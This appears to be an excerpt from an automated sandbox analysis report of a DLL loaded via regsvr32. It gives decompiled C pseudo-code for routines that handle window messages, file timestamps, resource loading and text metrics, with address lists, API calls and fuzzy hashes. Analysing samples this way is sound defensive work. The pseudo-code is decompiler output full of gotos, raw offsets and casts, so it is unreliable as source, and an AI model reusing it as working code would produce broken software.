				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10006D96( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
								if((E1002049B(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E10006DAF( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E10006DAF( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1002049B(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                                                            0x10020852
                                                                                                            0x10020853
                                                                                                            0x10020856
                                                                                                            0x1002085d
                                                                                                            0x10020863
                                                                                                            0x10020868
                                                                                                            0x10020878
                                                                                                            0x10020891
                                                                                                            0x10020899
                                                                                                            0x100208a1
                                                                                                            0x100208a4
                                                                                                            0x100208ae
                                                                                                            0x100208ef
                                                                                                            0x100208c4
                                                                                                            0x100208c8
                                                                                                            0x100208d5
                                                                                                            0x00000000
                                                                                                            0x100208d7
                                                                                                            0x100208d7
                                                                                                            0x100208dd
                                                                                                            0x00000000
                                                                                                            0x1002094a
                                                                                                            0x1002094a
                                                                                                            0x1002094a
                                                                                                            0x00000000
                                                                                                            0x1002094a
                                                                                                            0x100208dd
                                                                                                            0x00000000
                                                                                                            0x100208d5
                                                                                                            0x100208fa
                                                                                                            0x10020904
                                                                                                            0x10020943
                                                                                                            0x1002091a
                                                                                                            0x1002091f
                                                                                                            0x10020922
                                                                                                            0x10020937
                                                                                                            0x10020937
                                                                                                            0x10020941
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10020924
                                                                                                            0x10020932
                                                                                                            0x00000000
                                                                                                            0x10020934
                                                                                                            0x10020934
                                                                                                            0x00000000
                                                                                                            0x10020934
                                                                                                            0x10020932
                                                                                                            0x00000000
                                                                                                            0x10020922
                                                                                                            0x1002087a
                                                                                                            0x10020883
                                                                                                            0x10020888
                                                                                                            0x1002088b
                                                                                                            0x1002094d
                                                                                                            0x10020956
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002088b
                                                                                                            0x10020958
                                                                                                            0x10020958
                                                                                                            0x10020868
                                                                                                            0x1002095c

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                                                            • Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
                                                                                                            • Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                                                            • Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10026B4F Relevance: 6.1, APIs: 4, Instructions: 103stringtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10026B4F(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E10011C50(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x100401d4; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}



















                                                                                                            0x10026b57
                                                                                                            0x10026b64
                                                                                                            0x10026b66
                                                                                                            0x10026b7a
                                                                                                            0x10026b80
                                                                                                            0x10026b83
                                                                                                            0x10026b89
                                                                                                            0x10026c56
                                                                                                            0x00000000
                                                                                                            0x10026c58
                                                                                                            0x10026b97
                                                                                                            0x10026ba4
                                                                                                            0x10026bbf
                                                                                                            0x00000000
                                                                                                            0x10026bbf
                                                                                                            0x10026baa
                                                                                                            0x10026bb3
                                                                                                            0x10026bb6
                                                                                                            0x10026bb9
                                                                                                            0x10026bc6
                                                                                                            0x10026bcc
                                                                                                            0x10026be4
                                                                                                            0x10026bce
                                                                                                            0x10026bce
                                                                                                            0x10026bce
                                                                                                            0x10026bf0
                                                                                                            0x10026bf7
                                                                                                            0x10026bfc
                                                                                                            0x10026c08
                                                                                                            0x10026c0f
                                                                                                            0x10026c15
                                                                                                            0x10026c21
                                                                                                            0x10026c28
                                                                                                            0x10026c2e
                                                                                                            0x10026c36
                                                                                                            0x10026c3a
                                                                                                            0x10026c3f
                                                                                                            0x10026c3f
                                                                                                            0x10026c48
                                                                                                            0x10026c4d
                                                                                                            0x10026c53
                                                                                                            0x10026c53
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
                                                                                                            • GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 10026BD4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesSizeTimelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1499663573-0
                                                                                                            • Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                                                            • Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
                                                                                                            • Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                                                            • Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C29A Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 29%
                                                                                                            			E1000C29A(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x10043098);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E10011C50( &_v56, 0, 0x20);
							E10011C50( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E1000A823(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}





















                                                                                                            0x1000c2a5
                                                                                                            0x1000c2b3
                                                                                                            0x00000000
                                                                                                            0x1000c2b5
                                                                                                            0x1000c2c3
                                                                                                            0x1000c2c6
                                                                                                            0x1000c2fa
                                                                                                            0x1000c300
                                                                                                            0x1000c30d
                                                                                                            0x1000c313
                                                                                                            0x1000c319
                                                                                                            0x1000c31a
                                                                                                            0x1000c31f
                                                                                                            0x1000c324
                                                                                                            0x1000c329
                                                                                                            0x1000c332
                                                                                                            0x1000c33e
                                                                                                            0x1000c343
                                                                                                            0x1000c368
                                                                                                            0x1000c36e
                                                                                                            0x1000c374
                                                                                                            0x1000c377
                                                                                                            0x1000c37c
                                                                                                            0x1000c37c
                                                                                                            0x1000c381
                                                                                                            0x1000c386
                                                                                                            0x1000c386
                                                                                                            0x1000c38b
                                                                                                            0x1000c390
                                                                                                            0x1000c390
                                                                                                            0x1000c392
                                                                                                            0x1000c398
                                                                                                            0x1000c39e
                                                                                                            0x1000c3a0
                                                                                                            0x1000c3a0
                                                                                                            0x1000c39e
                                                                                                            0x1000c329
                                                                                                            0x1000c3aa
                                                                                                            0x00000000
                                                                                                            0x1000c2c8
                                                                                                            0x1000c2ce
                                                                                                            0x1000c2d5
                                                                                                            0x1000c2d8
                                                                                                            0x1000c2db
                                                                                                            0x1000c2de
                                                                                                            0x1000c2e1
                                                                                                            0x1000c2e4
                                                                                                            0x1000c2e7
                                                                                                            0x1000c2ea
                                                                                                            0x1000c2ef
                                                                                                            0x1000c2f4
                                                                                                            0x1000c3ac
                                                                                                            0x00000000
                                                                                                            0x1000c3ac
                                                                                                            0x00000000
                                                                                                            0x1000c2f4

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$ClearVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 3349467263-0
                                                                                                            • Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                                                            • Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
                                                                                                            • Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                                                            • Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10036A6D Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t22;
				signed short _t23;
				void* _t24;
				signed int _t29;
				signed short _t31;
				void* _t37;
				signed short _t38;
				signed short* _t47;
				void* _t53;
				struct HINSTANCE__* _t56;
				void* _t58;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				_t56 =  *(E100373B5() + 0xc);
				_t22 = FindResourceA(_t56, _a4, 0xf1);
				if(_t22 == 0) {
					L3:
					_t23 = 0;
				} else {
					_t24 = LoadResource(_t56, _t22);
					_v12 = _t24;
					if(_t24 == 0) {
						goto L3;
					} else {
						_t58 = LockResource(_t24);
						if(_t58 != 0) {
							_push(_t37);
							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
							_t29 = 0;
							__eflags =  *(_t58 + 6);
							if( *(_t58 + 6) > 0) {
								_t7 = _t58 + 8; // 0x8
								_t47 = _t7;
								do {
									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
									_t29 = _t29 + 1;
									_t47 =  &(_t47[1]);
									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
							}
							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
							_push(_t53);
							_t38 = _t31;
							L1001F7A9(_t38, _t53, _t58, __eflags);
							__eflags = _t38;
							if(_t38 != 0) {
								_t44 =  *(_t58 + 4) & 0x0000ffff;
								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
								_t38 = E1003697A(_v8, _a4);
							}
							FreeResource(_v12);
							_t23 = _t38;
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}




















                                                                                                            0x10036a70
                                                                                                            0x10036a71
                                                                                                            0x10036a73
                                                                                                            0x10036a7b
                                                                                                            0x10036a87
                                                                                                            0x10036a8f
                                                                                                            0x10036aad
                                                                                                            0x10036aad
                                                                                                            0x10036a91
                                                                                                            0x10036a93
                                                                                                            0x10036a9b
                                                                                                            0x10036a9e
                                                                                                            0x00000000
                                                                                                            0x10036aa0
                                                                                                            0x10036aa7
                                                                                                            0x10036aab
                                                                                                            0x10036ab5
                                                                                                            0x10036ac0
                                                                                                            0x10036ac2
                                                                                                            0x10036ac4
                                                                                                            0x10036ac9
                                                                                                            0x10036acb
                                                                                                            0x10036acb
                                                                                                            0x10036ace
                                                                                                            0x10036ad1
                                                                                                            0x10036ad8
                                                                                                            0x10036ada
                                                                                                            0x10036adb
                                                                                                            0x10036adb
                                                                                                            0x10036ace
                                                                                                            0x10036ae8
                                                                                                            0x10036aed
                                                                                                            0x10036aee
                                                                                                            0x10036af0
                                                                                                            0x10036af5
                                                                                                            0x10036af8
                                                                                                            0x10036afa
                                                                                                            0x10036b0f
                                                                                                            0x10036b1f
                                                                                                            0x10036b1f
                                                                                                            0x10036b24
                                                                                                            0x10036b2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10036aab
                                                                                                            0x10036a9e
                                                                                                            0x10036b30

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 10036A93
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10036AA1
                                                                                                            • FreeResource.KERNEL32(?), ref: 10036B24
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                                                            • Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
                                                                                                            • Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                                                            • Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000BEEF Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1000BEEF(void* __edi) {
				intOrPtr _t35;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t60;
				void* _t63;

				E10011BF0(0x1003aec3, _t63);
				_t60 = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x10040668;
				_t48 =  *((intOrPtr*)(_t63 + 8));
				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t48 - 8)) == 0) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
					_t35 = E10029068();
					 *((intOrPtr*)(_t48 - 8)) = _t35;
					if(_t35 == 0) {
						goto L1;
					} else {
						if( *(_t63 + 0xc) != 0) {
							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t60 = 0;
						}
						E1002935D(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
						E10028ED2( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
						_t50 =  *((intOrPtr*)(_t48 - 8));
						if(_t50 != _t60) {
							_t46 =  *((intOrPtr*)(_t50 + 4));
						} else {
							_t46 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
					}
				} else {
					L1:
					_t60 = 0x80004005;
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x1003eb6c;
				E100293B4(_t63 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t60;
			}









                                                                                                            0x1000bef4
                                                                                                            0x1000befe
                                                                                                            0x1000bf00
                                                                                                            0x1000bf03
                                                                                                            0x1000bf0d
                                                                                                            0x1000bf10
                                                                                                            0x1000bf15
                                                                                                            0x1000bf18
                                                                                                            0x1000bf33
                                                                                                            0x1000bf34
                                                                                                            0x1000bf3b
                                                                                                            0x1000bf3e
                                                                                                            0x00000000
                                                                                                            0x1000bf40
                                                                                                            0x1000bf43
                                                                                                            0x1000bf66
                                                                                                            0x1000bf45
                                                                                                            0x1000bf4f
                                                                                                            0x1000bf50
                                                                                                            0x1000bf51
                                                                                                            0x1000bf52
                                                                                                            0x1000bf53
                                                                                                            0x1000bf55
                                                                                                            0x1000bf7a
                                                                                                            0x1000bf88
                                                                                                            0x1000bf8d
                                                                                                            0x1000bf92
                                                                                                            0x1000bf98
                                                                                                            0x1000bf94
                                                                                                            0x1000bf94
                                                                                                            0x1000bf94
                                                                                                            0x1000bf9e
                                                                                                            0x1000bf9e
                                                                                                            0x1000bf1a
                                                                                                            0x1000bf1a
                                                                                                            0x1000bf1a
                                                                                                            0x1000bf1a
                                                                                                            0x1000bfa0
                                                                                                            0x1000bfa7
                                                                                                            0x1000bfae
                                                                                                            0x1000bfba
                                                                                                            0x1000bfc2

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateH_prologIndirectRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2123978231-0
                                                                                                            • Opcode ID: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                                                            • Instruction ID: 0eb4197897c7316f9a7e31aff11a4a7e3f3024ffe359f966774616c60da486ac
                                                                                                            • Opcode Fuzzy Hash: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                                                            • Instruction Fuzzy Hash: E121397690062ADFDB01CFA4C8849AEB7B8FF08790F514166F906AB255C771AE05CFB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002C73E Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				struct HDC__* _v44;
				char _v52;
				struct tagTEXTMETRICA _v108;
				void* __ebp;
				long _t25;
				int _t35;
				intOrPtr* _t40;
				void* _t43;
				intOrPtr _t53;
				intOrPtr* _t59;
				intOrPtr _t60;

				_t59 = __ecx;
				_push(0);
				E100290F7( &_v52);
				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_t43 = 0;
				if(_t25 != 0) {
					_t43 = E1000866D( &_v52, _t25);
				}
				GetTextMetricsA(_v44,  &_v108);
				_t62 = _t43;
				if(_t43 != 0) {
					E1000866D( &_v52, _t43);
				}
				E10029152( &_v52, _t62);
				SetRectEmpty( &_v32);
				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
				_t35 = GetSystemMetrics(6);
				_t60 =  *((intOrPtr*)(_t59 + 0x90));
				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
				if(_t53 < _t60) {
					_t53 = _t60;
				}
				_t40 = _a4;
				 *_t40 = 0x7fff;
				 *((intOrPtr*)(_t40 + 4)) = _t53;
				return _t40;
			}

















                                                                                                            0x1002c747
                                                                                                            0x1002c74b
                                                                                                            0x1002c74f
                                                                                                            0x1002c75b
                                                                                                            0x1002c761
                                                                                                            0x1002c765
                                                                                                            0x1002c770
                                                                                                            0x1002c770
                                                                                                            0x1002c779
                                                                                                            0x1002c77f
                                                                                                            0x1002c781
                                                                                                            0x1002c787
                                                                                                            0x1002c787
                                                                                                            0x1002c78f
                                                                                                            0x1002c798
                                                                                                            0x1002c7a9
                                                                                                            0x1002c7bd
                                                                                                            0x1002c7d0
                                                                                                            0x1002c7dc
                                                                                                            0x1002c7e9
                                                                                                            0x1002c7ef
                                                                                                            0x1002c7f1
                                                                                                            0x1002c7f1
                                                                                                            0x1002c7f3
                                                                                                            0x1002c7f8
                                                                                                            0x1002c7fa
                                                                                                            0x1002c7ff

                                                                                                            APIs
                                                                                                              • Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
                                                                                                              • Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A
                                                                                                            • SendMessageA.USER32 ref: 1002C75B
                                                                                                            • GetTextMetricsA.GDI32(?,?), ref: 1002C779
                                                                                                            • SetRectEmpty.USER32(?), ref: 1002C798
                                                                                                            • GetSystemMetrics.USER32 ref: 1002C7D0
                                                                                                              • Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
                                                                                                            • String ID:
                                                                                                            • API String ID: 1847300772-0
